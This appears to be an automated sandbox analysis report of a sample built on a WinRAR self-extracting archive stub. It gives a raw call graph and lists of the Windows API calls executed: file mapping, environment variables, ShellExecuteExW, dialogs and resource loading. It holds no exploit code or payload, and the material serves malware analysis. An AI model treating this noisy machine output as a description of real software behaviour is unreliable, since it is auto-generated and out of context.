a2204b 89 API calls __ehhandler$___std_fs_get_file_id@8 29876->29898 29877->29872 29877->29874 29877->29876 29879 a3909b 118 API calls 29879->29867 29883 a255b9 29882->29883 29884 a255a9 29882->29884 29886 a394ea 155 API calls 29883->29886 29885 a2d771 155 API calls 29884->29885 29887 a255b7 29885->29887 29886->29887 29901 a2fd28 5 API calls __ehhandler$___std_fs_get_file_id@8 29887->29901 29889 a255f1 29889->29891 29902 a232d2 89 API calls __ehhandler$___std_fs_get_file_id@8 29889->29902 29891->29879 29892->29841 29893->29853 29894->29857 29895->29841 29896->29844 29897->29867 29898->29891 29899->29872 29900->29873 29901->29889 29902->29891 29903->29867 29905 a40693 GetMessageW 29904->29905 29906 a406cc GetDlgItem 29904->29906 29907 a406b8 TranslateMessage DispatchMessageW 29905->29907 29908 a406a9 IsDialogMessageW 29905->29908 29906->28564 29906->28565 29907->29906 29908->29906 29908->29907 29910 a27493 29909->29910 29913 a27441 29909->29913 29919 a21a92 28 API calls std::_Xinvalid_argument 29910->29919 29917 a2744c 29913->29917 29918 a212d3 28 API calls Concurrency::cancel_current_task 29913->29918 29915 a27471 29916 a211b8 28 API calls 29915->29916 29916->29917 29917->28578 29918->29915 29921 a368e0 __EH_prolog3_GS 29920->29921 29935 a3663b 29921->29935 29926 a36929 29933 a3696e 29926->29933 29948 a36a3d 29926->29948 29951 a27ff0 28 API calls 29926->29951 29927 a3698e 29932 a369d2 29927->29932 29953 a219a9 26 API calls 29927->29953 29929 a45787 5 API calls 29930 a369e8 29929->29930 29930->28214 29932->29929 29933->29927 29952 a27ff0 28 API calls 29933->29952 29936 a366df 29935->29936 29937 a36651 29935->29937 29939 a2adcc 29936->29939 29937->29936 29938 a21b63 28 API calls 29937->29938 29938->29937 29940 a2ae43 29939->29940 29943 a2addd 29939->29943 29955 a21a92 28 API calls std::_Xinvalid_argument 29940->29955 29944 a2ade8 29943->29944 29954 a212d3 28 API calls Concurrency::cancel_current_task 29943->29954 29944->29926 29946 a2ae17 29947 a211b8 28 API calls 29946->29947 29947->29944 29956 a2f68d 29948->29956 29951->29926 29952->29927 29953->29932 29954->29946 29957 a2f6a4 __vsnwprintf_l 29956->29957 29960 a4cee1 29957->29960 29963 a4afa4 29960->29963 29964 a4afe4 29963->29964 29965 a4afcc 29963->29965 29964->29965 29966 a4afec 29964->29966 29980 a501d3 20 API calls __dosmaperr 29965->29980 29982 a4b543 38 API calls 2 library calls 29966->29982 29969 a4afd1 29981 a4ac8e 26 API calls __cftof 29969->29981 29970 a4affc 29983 a4b50e 20 API calls 2 library calls 29970->29983 29973 a45734 __ehhandler$___std_fs_get_file_id@8 5 API calls 29975 a2f6ae 29973->29975 29974 a4b074 29984 a4b8f3 51 API calls 3 library calls 29974->29984 29975->29926 29978 a4b07f 29985 a4b5c6 20 API calls _free 29978->29985 29979 a4afdc 29979->29973 29980->29969 29981->29979 29982->29970 29983->29974 29984->29978 29985->29979 29986 a46452 29987 a4645e ___scrt_is_nonwritable_in_current_image 29986->29987 30018 a45e63 29987->30018 29989 a46465 29990 a465b8 29989->29990 29993 a4648f 29989->29993 30121 a46878 4 API calls 2 library calls 29990->30121 29992 a465bf 30114 a4ee14 29992->30114 30003 a464ce ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 29993->30003 30029 a4f9ad 29993->30029 30000 a464ae 30008 a4652f 30003->30008 30117 a4e9b0 38 API calls 2 library calls 30003->30117 30004 a46535 30038 a4f8fe 51 API calls 30004->30038 30007 a4653d 30039 a4454a 30007->30039 30037 a46993 GetStartupInfoW __cftof 30008->30037 30012 a46551 30012->29992 30013 a46555 30012->30013 30014 a4655e 30013->30014 30119 a4edb7 28 API calls _abort 30013->30119 30120 a45fd4 12 API calls ___scrt_uninitialize_crt 30014->30120 30017 a46566 30017->30000 30019 a45e6c 30018->30019 30123 a46694 IsProcessorFeaturePresent 30019->30123 30021 a45e78 30124 a496d9 10 API calls 2 library calls 30021->30124 30023 a45e7d 30024 a45e81 30023->30024 30125 a4f837 30023->30125 30024->29989 30027 a45e98 30027->29989 30032 a4f9c4 30029->30032 30030 a45734 __ehhandler$___std_fs_get_file_id@8 5 API calls 30031 a464a8 30030->30031 30031->30000 30033 a4f951 30031->30033 30032->30030 30034 a4f980 30033->30034 30035 a45734 __ehhandler$___std_fs_get_file_id@8 5 API calls 30034->30035 30036 a4f9a9 30035->30036 30036->30003 30037->30004 30038->30007 30192 a36d7b 30039->30192 30042 a31309 30 API calls 30043 a44572 30042->30043 30274 a3f4d4 30043->30274 30045 a4457b __cftof 30278 a3f89a 30045->30278 30049 a44608 GetCommandLineW 30050 a44618 30049->30050 30051 a446f9 30049->30051 30053 a214a7 28 API calls 30050->30053 30052 a313f9 29 API calls 30051->30052 30054 a44703 30052->30054 30055 a44622 30053->30055 30056 a225a4 26 API calls 30054->30056 30057 a419ee 115 API calls 30055->30057 30058 a44710 30056->30058 30059 a4462c 30057->30059 30060 a21a66 26 API calls 30058->30060 30061 a21a66 26 API calls 30059->30061 30062 a44719 SetEnvironmentVariableW GetLocalTime 30060->30062 30063 a44635 30061->30063 30067 a2f6ba _swprintf 51 API calls 30062->30067 30065 a44642 OpenFileMappingW 30063->30065 30066 a446dc 30063->30066 30069 a446d2 CloseHandle 30065->30069 30070 a4465b MapViewOfFile 30065->30070 30068 a214a7 28 API calls 30066->30068 30071 a4477e SetEnvironmentVariableW GetModuleHandleW LoadIconW 30067->30071 30072 a446e6 30068->30072 30069->30051 30070->30069 30073 a4466b UnmapViewOfFile MapViewOfFile 30070->30073 30074 a407e5 34 API calls 30071->30074 30075 a43efc 30 API calls 30072->30075 30073->30069 30076 a44689 30073->30076 30077 a447bc 30074->30077 30078 a446f0 30075->30078 30079 a3fc38 28 API calls 30076->30079 30080 a33538 133 API calls 30077->30080 30081 a21a66 26 API calls 30078->30081 30082 a44699 30079->30082 30084 a447cc 30080->30084 30081->30051 30083 a43efc 30 API calls 30082->30083 30085 a446a2 30083->30085 30086 a3d255 28 API calls 30084->30086 30087 a35109 114 API calls 30085->30087 30088 a447d8 30086->30088 30090 a446b5 30087->30090 30089 a3d255 28 API calls 30088->30089 30091 a447e1 DialogBoxParamW 30089->30091 30092 a351bf 114 API calls 30090->30092 30093 a3d347 26 API calls 30091->30093 30094 a446c0 30092->30094 30095 a4481e 30093->30095 30097 a446cb UnmapViewOfFile 30094->30097 30096 a3d347 26 API calls 30095->30096 30098 a4482a 30096->30098 30097->30069 30099 a44833 Sleep 30098->30099 30100 a4483a 30098->30100 30099->30100 30101 a44848 30100->30101 30102 a3fb4b 48 API calls 30100->30102 30103 a44852 DeleteObject 30101->30103 30102->30101 30104 a44867 DeleteObject 30103->30104 30105 a4486e 30103->30105 30104->30105 30106 a448b0 30105->30106 30107 a4489e 30105->30107 30110 a3f53a GdiplusShutdown CoUninitialize 30106->30110 30108 a43fcf 6 API calls 30107->30108 30109 a448a4 CloseHandle 30108->30109 30109->30106 30111 a448ea 30110->30111 30112 a45734 __ehhandler$___std_fs_get_file_id@8 5 API calls 30111->30112 30113 a448fd 30112->30113 30118 a469c9 GetModuleHandleW 30113->30118 30341 a4eb91 30114->30341 30117->30008 30118->30012 30119->30014 30120->30017 30121->29992 30123->30021 30124->30023 30129 a52d0a 30125->30129 30128 a496f8 7 API calls 2 library calls 30128->30024 30132 a52d27 30129->30132 30133 a52d23 30129->30133 30130 a45734 __ehhandler$___std_fs_get_file_id@8 5 API calls 30131 a45e8a 30130->30131 30131->30027 30131->30128 30132->30133 30135 a51320 30132->30135 30133->30130 30136 a5132c ___scrt_is_nonwritable_in_current_image 30135->30136 30147 a518e1 EnterCriticalSection 30136->30147 30138 a51333 30148 a531d8 30138->30148 30140 a51342 30141 a51351 30140->30141 30161 a511b0 29 API calls 30140->30161 30163 a5136d LeaveCriticalSection _abort 30141->30163 30144 a5134c 30162 a51266 GetStdHandle GetFileType 30144->30162 30145 a51362 _abort 30145->30132 30147->30138 30149 a531e4 ___scrt_is_nonwritable_in_current_image 30148->30149 30150 a531f1 30149->30150 30151 a53208 30149->30151 30172 a501d3 20 API calls __dosmaperr 30150->30172 30164 a518e1 EnterCriticalSection 30151->30164 30154 a531f6 30173 a4ac8e 26 API calls __cftof 30154->30173 30156 a53200 _abort 30156->30140 30157 a53240 30174 a53267 LeaveCriticalSection _abort 30157->30174 30158 a53214 30158->30157 30165 a53129 30158->30165 30161->30144 30162->30141 30163->30145 30164->30158 30175 a51de6 30165->30175 30167 a5313b 30171 a53148 30167->30171 30188 a51bba 11 API calls 2 library calls 30167->30188 30170 a5319a 30170->30158 30182 a503d4 30171->30182 30172->30154 30173->30156 30174->30156 30180 a51df3 __dosmaperr 30175->30180 30176 a51e33 30190 a501d3 20 API calls __dosmaperr 30176->30190 30177 a51e1e RtlAllocateHeap 30178 a51e31 30177->30178 30177->30180 30178->30167 30180->30176 30180->30177 30189 a4e91a 7 API calls 2 library calls 30180->30189 30183 a50408 __dosmaperr 30182->30183 30184 a503df RtlFreeHeap 30182->30184 30183->30170 30184->30183 30185 a503f4 30184->30185 30191 a501d3 20 API calls __dosmaperr 30185->30191 30187 a503fa GetLastError 30187->30183 30188->30167 30189->30180 30190->30178 30191->30187 30294 a45b20 30192->30294 30195 a36dd3 GetProcAddress 30197 a36de5 30195->30197 30198 a36dfd GetProcAddress 30195->30198 30196 a36e28 30199 a3719b 30196->30199 30325 a4e50e 42 API calls __vsnwprintf_l 30196->30325 30197->30198 30198->30196 30200 a36e0f 30198->30200 30202 a313f9 29 API calls 30199->30202 30200->30196 30204 a371a6 30202->30204 30203 a37098 30203->30199 30206 a313f9 29 API calls 30203->30206 30205 a32117 45 API calls 30204->30205 30208 a371ba 30205->30208 30207 a370ac 30206->30207 30209 a370ba 30207->30209 30210 a370bd CreateFileW 30207->30210 30219 a214a7 28 API calls 30208->30219 30224 a371de CompareStringW 30208->30224 30225 a3229d 45 API calls 30208->30225 30227 a21a66 26 API calls 30208->30227 30232 a2ed1f 49 API calls 30208->30232 30249 a37248 30208->30249 30296 a3067e 30208->30296 30301 a36c5e 30208->30301 30209->30210 30211 a37186 CloseHandle 30210->30211 30212 a370db SetFilePointer 30210->30212 30215 a21a66 26 API calls 30211->30215 30212->30211 30214 a370ed ReadFile 30212->30214 30214->30211 30216 a37109 30214->30216 30217 a37199 30215->30217 30220 a373f2 30216->30220 30221 a3711a 30216->30221 30217->30199 30219->30208 30328 a45ce1 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess IsProcessorFeaturePresent 30220->30328 30222 a214a7 28 API calls 30221->30222 30229 a37133 30222->30229 30224->30208 30225->30208 30226 a373f7 30227->30208 30230 a37176 30229->30230 30240 a36c5e 30 API calls 30229->30240 30326 a36366 28 API calls 30229->30326 30233 a21a66 26 API calls 30230->30233 30231 a37292 30234 a3729e 30231->30234 30235 a373bd 30231->30235 30232->30208 30237 a3717e 30233->30237 30327 a32187 45 API calls 30234->30327 30238 a21a66 26 API calls 30235->30238 30242 a21a66 26 API calls 30237->30242 30243 a373c5 30238->30243 30239 a214a7 28 API calls 30239->30249 30240->30229 30241 a372a7 30244 a3067e 6 API calls 30241->30244 30242->30211 30245 a21a66 26 API calls 30243->30245 30247 a372ac 30244->30247 30248 a373cd 30245->30248 30246 a3229d 45 API calls 30246->30249 30250 a372b3 30247->30250 30251 a37332 30247->30251 30252 a45734 __ehhandler$___std_fs_get_file_id@8 5 API calls 30248->30252 30249->30231 30249->30239 30249->30246 30253 a21a66 26 API calls 30249->30253 30259 a2ed1f 49 API calls 30249->30259 30254 a36c5e 30 API calls 30250->30254 30255 a36a25 53 API calls 30251->30255 30256 a373e8 30252->30256 30253->30249 30257 a372bd 30254->30257 30258 a3735b AllocConsole 30255->30258 30256->30042 30260 a36c5e 30 API calls 30257->30260 30261 a37368 GetCurrentProcessId AttachConsole 30258->30261 30273 a37310 30258->30273 30259->30249 30262 a372c7 30260->30262 30263 a37383 30261->30263 30264 a34318 53 API calls 30262->30264 30268 a3738c GetStdHandle WriteConsoleW Sleep FreeConsole 30263->30268 30266 a372ec 30264->30266 30265 a373b5 ExitProcess 30267 a36a25 53 API calls 30266->30267 30269 a372f6 30267->30269 30268->30273 30270 a34318 53 API calls 30269->30270 30271 a37307 30270->30271 30272 a214a7 28 API calls 30271->30272 30272->30273 30273->30265 30275 a36c5e 30 API calls 30274->30275 30276 a3f4e8 OleInitialize 30275->30276 30277 a3f50b GdiplusStartup SHGetMalloc 30276->30277 30277->30045 30279 a225a4 26 API calls 30278->30279 30280 a3f8a8 30279->30280 30281 a225a4 26 API calls 30280->30281 30282 a3f8b4 30281->30282 30283 a225a4 26 API calls 30282->30283 30284 a3f8c0 30283->30284 30285 a225a4 26 API calls 30284->30285 30286 a3f8cc 30285->30286 30287 a3f84c 30286->30287 30288 a21a66 26 API calls 30287->30288 30289 a3f857 30288->30289 30290 a21a66 26 API calls 30289->30290 30291 a3f85f 30290->30291 30292 a21a66 26 API calls 30291->30292 30293 a3f867 30292->30293 30295 a36d8d GetModuleHandleW 30294->30295 30295->30195 30295->30196 30297 a306a4 GetVersionExW 30296->30297 30298 a306d1 30296->30298 30297->30298 30299 a45734 __ehhandler$___std_fs_get_file_id@8 5 API calls 30298->30299 30300 a306fa 30299->30300 30300->30208 30302 a36c6a __EH_prolog3_GS 30301->30302 30303 a456f6 28 API calls 30302->30303 30304 a36c77 30303->30304 30305 a36c8d GetSystemDirectoryW 30304->30305 30306 a36ca4 30305->30306 30307 a36cab 30305->30307 30309 a36d71 30306->30309 30311 a212a7 26 API calls 30306->30311 30308 a214a7 28 API calls 30307->30308 30310 a36ccd 30308->30310 30312 a45787 5 API calls 30309->30312 30313 a214a7 28 API calls 30310->30313 30311->30309 30314 a36d78 30312->30314 30315 a36cda 30313->30315 30314->30208 30329 a31ad1 30315->30329 30318 a21a66 26 API calls 30319 a36cf7 30318->30319 30320 a21a66 26 API calls 30319->30320 30321 a36cff LoadLibraryW 30320->30321 30321->30306 30323 a36d1c 30321->30323 30323->30306 30339 a219a9 26 API calls 30323->30339 30325->30203 30326->30229 30327->30241 30328->30226 30330 a31add __EH_prolog3_GS 30329->30330 30331 a27673 28 API calls 30330->30331 30332 a31aef 30331->30332 30334 a31b0c 30332->30334 30340 a30ddb 28 API calls 30332->30340 30335 a21a66 26 API calls 30334->30335 30336 a31b35 30335->30336 30337 a45787 5 API calls 30336->30337 30338 a31b3a 30337->30338 30338->30318 30339->30306 30340->30334 30342 a4eb9d _abort 30341->30342 30343 a4eba4 30342->30343 30344 a4ebb6 30342->30344 30377 a4eceb GetModuleHandleW 30343->30377 30365 a518e1 EnterCriticalSection 30344->30365 30347 a4eba9 30347->30344 30378 a4ed2f GetModuleHandleExW 30347->30378 30348 a4ec5b 30366 a4ec9b 30348->30366 30352 a4ec32 30354 a4ec4a 30352->30354 30359 a4f951 _abort 5 API calls 30352->30359 30360 a4f951 _abort 5 API calls 30354->30360 30355 a4ebbd 30355->30348 30355->30352 30386 a4f6a0 20 API calls _abort 30355->30386 30356 a4eca4 30387 a58fc0 5 API calls __ehhandler$___std_fs_get_file_id@8 30356->30387 30357 a4ec78 30369 a4ecaa 30357->30369 30359->30354 30360->30348 30365->30355 30388 a51931 LeaveCriticalSection 30366->30388 30368 a4ec74 30368->30356 30368->30357 30389 a51d26 30369->30389 30372 a4ecd8 30375 a4ed2f _abort 8 API calls 30372->30375 30373 a4ecb8 GetPEB 30373->30372 30374 a4ecc8 GetCurrentProcess TerminateProcess 30373->30374 30374->30372 30376 a4ece0 ExitProcess 30375->30376 30377->30347 30379 a4ed7c 30378->30379 30380 a4ed59 GetProcAddress 30378->30380 30382 a4ed82 FreeLibrary 30379->30382 30383 a4ed8b 30379->30383 30381 a4ed6e 30380->30381 30381->30379 30382->30383 30384 a45734 __ehhandler$___std_fs_get_file_id@8 5 API calls 30383->30384 30385 a4ebb5 30384->30385 30385->30344 30386->30352 30388->30368 30390 a51d41 30389->30390 30391 a51d4b 30389->30391 30393 a45734 __ehhandler$___std_fs_get_file_id@8 5 API calls 30390->30393 30396 a51948 5 API calls __dosmaperr 30391->30396 30394 a4ecb4 30393->30394 30394->30372 30394->30373 30395 a51d62 30395->30390 30396->30395 30397 a44d22 30398 a44ce9 30397->30398 30398->30397 30399 a44fce ___delayLoadHelper2@8 17 API calls 30398->30399 30399->30398 30400 a42813 30401 a27673 28 API calls 30400->30401 30407 a42832 _wcslen 30401->30407 30402 a42af7 30474 a258cb 45 API calls 30402->30474 30403 a27673 28 API calls 30404 a42aec 30403->30404 30432 a438a0 30404->30432 30407->30402 30409 a2120c 28 API calls 30407->30409 30423 a42a9a 30407->30423 30412 a428fe 30409->30412 30470 a3645a 28 API calls 30412->30470 30417 a42a01 30426 a42a39 30417->30426 30472 a219a9 26 API calls 30417->30472 30420 a4292f 30420->30417 30428 a214a7 28 API calls 30420->30428 30429 a2adaa CompareStringW 30420->30429 30430 a21a66 26 API calls 30420->30430 30471 a3645a 28 API calls 30420->30471 30423->30402 30423->30403 30426->30423 30473 a219a9 26 API calls 30426->30473 30428->30420 30429->30420 30430->30420 30437 a438ac __cftof __EH_prolog3_GS 30432->30437 30433 a21a66 26 API calls 30434 a43bcf 30433->30434 30435 a45787 5 API calls 30434->30435 30436 a43bd4 30435->30436 30436->30402 30438 a43a1e 30437->30438 30461 a43ba8 30437->30461 30481 a38da4 CompareStringW 30437->30481 30440 a214a7 28 API calls 30438->30440 30441 a43a34 30440->30441 30442 a2ed0d 49 API calls 30441->30442 30443 a43a41 30442->30443 30444 a21a66 26 API calls 30443->30444 30445 a43a4b 30444->30445 30446 a43a9d ShellExecuteExW 30445->30446 30447 a214a7 28 API calls 30445->30447 30448 a43ab2 30446->30448 30449 a43b7c 30446->30449 30450 a43a71 30447->30450 30452 a43ae5 WaitForInputIdle 30448->30452 30453 a43ace IsWindowVisible 30448->30453 30458 a43b30 CloseHandle 30448->30458 30449->30461 30484 a219a9 26 API calls 30449->30484 30482 a30e49 51 API calls 2 library calls 30450->30482 30475 a43fcf WaitForSingleObject 30452->30475 30453->30452 30454 a43ad9 ShowWindow 30453->30454 30454->30452 30456 a43a82 30460 a21a66 26 API calls 30456->30460 30462 a43b48 30458->30462 30463 a43b3d 30458->30463 30459 a43afb 30459->30458 30466 a43b08 GetExitCodeProcess 30459->30466 30464 a43a8e 30460->30464 30461->30433 30462->30449 30467 a43b73 ShowWindow 30462->30467 30483 a38da4 CompareStringW 30463->30483 30464->30446 30466->30458 30468 a43b19 30466->30468 30467->30449 30468->30458 30470->30420 30471->30420 30472->30426 30473->30423 30476 a43fea 30475->30476 30480 a4402f 30475->30480 30477 a43fed PeekMessageW 30476->30477 30478 a44020 WaitForSingleObject 30477->30478 30479 a43fff GetMessageW TranslateMessage DispatchMessageW 30477->30479 30478->30477 30478->30480 30479->30478 30480->30459 30481->30438 30482->30456 30483->30462 30484->30461 30485 a2e3d5 30491 a2e3df 30485->30491 30486 a45734 __ehhandler$___std_fs_get_file_id@8 5 API calls 30487 a2e481 30486->30487 30488 a2e551 SetFilePointer 30489 a2e56e GetLastError 30488->30489 30490 a2e403 30488->30490 30489->30490 30490->30486 30491->30488 30491->30490 30492 a21125 30493 a276e7 30 API calls 30492->30493 30494 a2112a 30493->30494 30497 a46029 29 API calls 30494->30497 30496 a21134 30497->30496 30498 a4437d 30499 a44389 __EH_prolog3_GS 30498->30499 30500 a34318 53 API calls 30499->30500 30501 a443c6 30500->30501 30502 a36a25 53 API calls 30501->30502 30503 a443d0 30502->30503 30504 a225a4 26 API calls 30503->30504 30505 a443dc 30504->30505 30506 a21a66 26 API calls 30505->30506 30507 a443e4 30506->30507 30508 a21de7 SetDlgItemTextW 30507->30508 30509 a443f5 30508->30509 30510 a40678 5 API calls 30509->30510 30511 a443fa 30510->30511 30512 a44430 30511->30512 30516 a219a9 26 API calls 30511->30516 30513 a45787 5 API calls 30512->30513 30514 a44446 30513->30514 30516->30512 30520 a44b8a 30521 a44b33 30520->30521 30522 a44fce ___delayLoadHelper2@8 17 API calls 30521->30522 30522->30521

                                                                                                                                                      Executed Functions

                                                                                                                                                      Function 00A4454A Relevance: 40.5, APIs: 18, Strings: 5, Instructions: 252filesleeptimeCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 502 a4454a-a44612 call a36d7b call a31309 call a3f4d4 call a471f0 call a3f89a call a3f84c GetCommandLineW 515 a44618-a4463c call a214a7 call a419ee call a21a66 502->515 516 a446f9-a44722 call a313f9 call a225a4 call a21a66 502->516 531 a44642-a44659 OpenFileMappingW 515->531 532 a446dc-a446f4 call a214a7 call a43efc call a21a66 515->532 529 a44724 516->529 530 a44729-a44831 SetEnvironmentVariableW GetLocalTime call a2f6ba SetEnvironmentVariableW GetModuleHandleW LoadIconW call a407e5 call a33538 call a3d255 * 2 DialogBoxParamW call a3d347 * 2 516->530 529->530 566 a44833-a44834 Sleep 530->566 567 a4483a-a44841 530->567 535 a446d2-a446da CloseHandle 531->535 536 a4465b-a44669 MapViewOfFile 531->536 532->516 535->516 536->535 539 a4466b-a44687 UnmapViewOfFile MapViewOfFile 536->539 539->535 542 a44689-a446cc call a3fc38 call a43efc call a35109 call a351bf call a351f8 UnmapViewOfFile 539->542 542->535 566->567 568 a44843 call a3fb4b 567->568 569 a44848-a44865 call a35041 DeleteObject 567->569 568->569 573 a44867-a44868 DeleteObject 569->573 574 a4486e-a44874 569->574 573->574 575 a44876-a4487d 574->575 576 a4488e-a4489c 574->576 575->576 577 a4487f-a44889 call a294b8 575->577 578 a448b0-a448bd 576->578 579 a4489e-a448aa call a43fcf CloseHandle 576->579 577->576 582 a448e1-a448e5 call a3f53a 578->582 583 a448bf-a448cb 578->583 579->578 590 a448ea-a44903 call a45734 582->590 585 a448cd-a448d5 583->585 586 a448db-a448dd 583->586 585->582 588 a448d7-a448d9 585->588 586->582 589 a448df 586->589 588->582 589->582
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00A36D7B: GetModuleHandleW.KERNEL32(kernel32,5C02E116), ref: 00A36DC7
                                                                                                                                                        • Part of subcall function 00A36D7B: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00A36DD9
                                                                                                                                                        • Part of subcall function 00A36D7B: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00A36E03
                                                                                                                                                        • Part of subcall function 00A31309: __EH_prolog3.LIBCMT ref: 00A31310
                                                                                                                                                        • Part of subcall function 00A31309: GetCurrentDirectoryW.KERNEL32(00000000,00000000,0000000C,00A317FB,?,?,\\?\,5C02E116,?,?,?,00000000,00A5A279,000000FF), ref: 00A31319
                                                                                                                                                        • Part of subcall function 00A3F4D4: OleInitialize.OLE32(00000000), ref: 00A3F4ED
                                                                                                                                                        • Part of subcall function 00A3F4D4: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00A3F524
                                                                                                                                                        • Part of subcall function 00A3F4D4: SHGetMalloc.SHELL32(00A7532C), ref: 00A3F52E
                                                                                                                                                      • GetCommandLineW.KERNEL32 ref: 00A44608
                                                                                                                                                      • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp,?,00000000), ref: 00A4464F
                                                                                                                                                      • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000009,?,00000000), ref: 00A44661
                                                                                                                                                      • UnmapViewOfFile.KERNEL32(00000000,?,00000000), ref: 00A4466F
                                                                                                                                                      • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,?,?,00000000), ref: 00A4467D
                                                                                                                                                        • Part of subcall function 00A3FC38: __EH_prolog3.LIBCMT ref: 00A3FC3F
                                                                                                                                                        • Part of subcall function 00A43EFC: __EH_prolog3_GS.LIBCMT ref: 00A43F03
                                                                                                                                                        • Part of subcall function 00A43EFC: SetEnvironmentVariableW.KERNEL32(sfxcmd,?,?,?,?,?,?,00000028), ref: 00A43F1B
                                                                                                                                                        • Part of subcall function 00A43EFC: SetEnvironmentVariableW.KERNEL32(sfxpar,?,?,?,?,?,?,?,00000028), ref: 00A43F86
                                                                                                                                                        • Part of subcall function 00A351BF: _wcslen.LIBCMT ref: 00A351E3
                                                                                                                                                      • UnmapViewOfFile.KERNEL32(00000000,00A75430,00000400,00A75430,00A75430,00000400,00000000,00000001,?,00000000), ref: 00A446CC
                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00A446D3
                                                                                                                                                      • SetEnvironmentVariableW.KERNEL32(sfxname,00A69698,00000000), ref: 00A4472F
                                                                                                                                                      • GetLocalTime.KERNEL32(?), ref: 00A4473A
                                                                                                                                                      • _swprintf.LIBCMT ref: 00A44779
                                                                                                                                                      • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00A4478E
                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00A44795
                                                                                                                                                      • LoadIconW.USER32(00000000,00000064), ref: 00A447AC
                                                                                                                                                      • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_00020900,00000000), ref: 00A44803
                                                                                                                                                      • Sleep.KERNELBASE(00001B58), ref: 00A44834
                                                                                                                                                      • DeleteObject.GDI32 ref: 00A44858
                                                                                                                                                      • DeleteObject.GDI32(16050E2A), ref: 00A44868
                                                                                                                                                        • Part of subcall function 00A214A7: _wcslen.LIBCMT ref: 00A214B8
                                                                                                                                                        • Part of subcall function 00A419EE: __EH_prolog3_GS.LIBCMT ref: 00A419F5
                                                                                                                                                      • CloseHandle.KERNEL32 ref: 00A448AA
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$EnvironmentHandleVariableView$AddressCloseDeleteH_prolog3H_prolog3_ModuleObjectProcUnmap_wcslen$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingOpenParamSleepStartupTime_swprintf
                                                                                                                                                      • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                                                                                                      • API String ID: 3142445277-3710569615
                                                                                                                                                      • Opcode ID: f6cd1615f6b466ada953cd3d00a5e5b1d1d4e36d0f223867a43004e2a7b87bf1
                                                                                                                                                      • Instruction ID: 740f7eabaf95f28917c25b31c6070eff8a499703e821b798177c0c22299e9c73
                                                                                                                                                      • Opcode Fuzzy Hash: f6cd1615f6b466ada953cd3d00a5e5b1d1d4e36d0f223867a43004e2a7b87bf1
                                                                                                                                                      • Instruction Fuzzy Hash: 0891F175904740AFD320EFB4EC45BABB7ECBB88701F404929F94997192DBB49846CB22
                                                                                                                                                      Function 00A3EBD3 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 100memorywindowCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 608 a3ebd3-a3ebf0 FindResourceW 609 a3ebf6-a3ec07 SizeofResource 608->609 610 a3ecec 608->610 609->610 612 a3ec0d-a3ec1c LoadResource 609->612 611 a3ecee-a3ecf2 610->611 612->610 613 a3ec22-a3ec2d LockResource 612->613 613->610 614 a3ec33-a3ec48 GlobalAlloc 613->614 615 a3ece4-a3ecea 614->615 616 a3ec4e-a3ec57 GlobalLock 614->616 615->611 617 a3ecdd-a3ecde GlobalFree 616->617 618 a3ec5d-a3ec7b call a46c70 CreateStreamOnHGlobal 616->618 617->615 621 a3ecd6-a3ecd7 GlobalUnlock 618->621 622 a3ec7d-a3ec9f call a3eb06 618->622 621->617 622->621 627 a3eca1-a3eca9 622->627 628 a3ecc4-a3ecd2 627->628 629 a3ecab-a3ecbf GdipCreateHBITMAPFromBitmap 627->629 628->621 629->628 630 a3ecc1 629->630 630->628
                                                                                                                                                      APIs
                                                                                                                                                      • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00A40845,00000066), ref: 00A3EBE6
                                                                                                                                                      • SizeofResource.KERNEL32(00000000,?,?,?,00A40845,00000066), ref: 00A3EBFD
                                                                                                                                                      • LoadResource.KERNEL32(00000000,?,?,?,00A40845,00000066), ref: 00A3EC14
                                                                                                                                                      • LockResource.KERNEL32(00000000,?,?,?,00A40845,00000066), ref: 00A3EC23
                                                                                                                                                      • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00A40845,00000066), ref: 00A3EC3E
                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00A3EC4F
                                                                                                                                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00A3EC73
                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00A3ECD7
